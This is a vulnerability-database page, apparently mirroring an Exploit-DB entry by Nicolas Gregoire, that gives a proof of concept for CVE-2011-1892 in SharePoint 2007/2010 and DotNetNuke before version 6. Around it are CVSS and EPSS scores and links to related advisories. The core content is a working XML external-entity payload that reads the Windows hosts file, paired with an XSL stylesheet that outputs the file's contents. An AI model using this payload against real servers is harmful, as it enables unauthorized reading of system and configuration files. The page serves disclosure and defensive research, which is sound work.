Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbNicolas GregoireEDB-ID:17873
HistorySep 20, 2011 - 12:00 a.m.

SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

2011-09-2000:00:00
Nicolas Gregoire
www.exploit-db.com
28

6.8 Medium

AI Score

Confidence

Low

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

0.074 Low

EPSS

Percentile

94.0%

JSON
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892

poc filename: xee.xml

<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>

poc filename: xee.xsl

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:template match="/">
        <xsl:apply-templates/>
                <xsl:value-of select="doc"/>
        </xsl:template>
</xsl:stylesheet>

Related

exploitpack 1
packetstorm 1
seebug 2
checkpoint_advisories 1
prion 1
cve 1
securityvulns 2
openvas 2
nessus 1
mskb 1
exploitpack
exploitpack
SharePoint 20072010 and DotNetNuke 6 - File Disclosure (via XEE)
2011-09-20 00:00:00
packetstorm
packetstorm
SharePoint 2007 / 2010 And DotNetNuke File Disclosure
2011-09-21 00:00:00
seebug
seebug
SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE
2014-07-01 00:00:00
Microsoft SharePoint XMLε€„η†θΏœη¨‹ζ–‡δ»Άζ³„ιœ²ζΌζ΄ž
2011-10-21 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft SharePoint Server XML Rollup Information Disclosure (MS11-074; CVE-2011-1892)
2011-09-13 00:00:00
prion
prion
Arbitrary file deletion
2011-09-15 12:26:00
cve
cve
CVE-2011-1892
2011-09-15 12:26:00
securityvulns
securityvulns
XEE vulnerabilities in SharePoint &#40;MS11-074&#41; and DotNetNuke
2011-09-20 00:00:00
Microsoft Sharepoint multiple security vulnerabilities
2011-09-20 00:00:00
openvas
openvas
Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858)
2011-09-14 00:00:00
Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858)
2011-09-14 00:00:00
nessus
nessus
MS11-074: Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858)
2011-09-14 00:00:00
mskb
mskb
MS11-074: Vulnerabilities in Microsoft SharePoint could allow elevation of privilege: September 13, 2011
2011-09-13 00:00:00

6.8 Medium

AI Score

Confidence

Low

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

0.074 Low

EPSS

Percentile

94.0%

JSON
Related for EDB-ID:17873
exploitpack1packetstorm1seebug2checkpoint_advisories1prion1cve1securityvulns2openvas2nessus1mskb1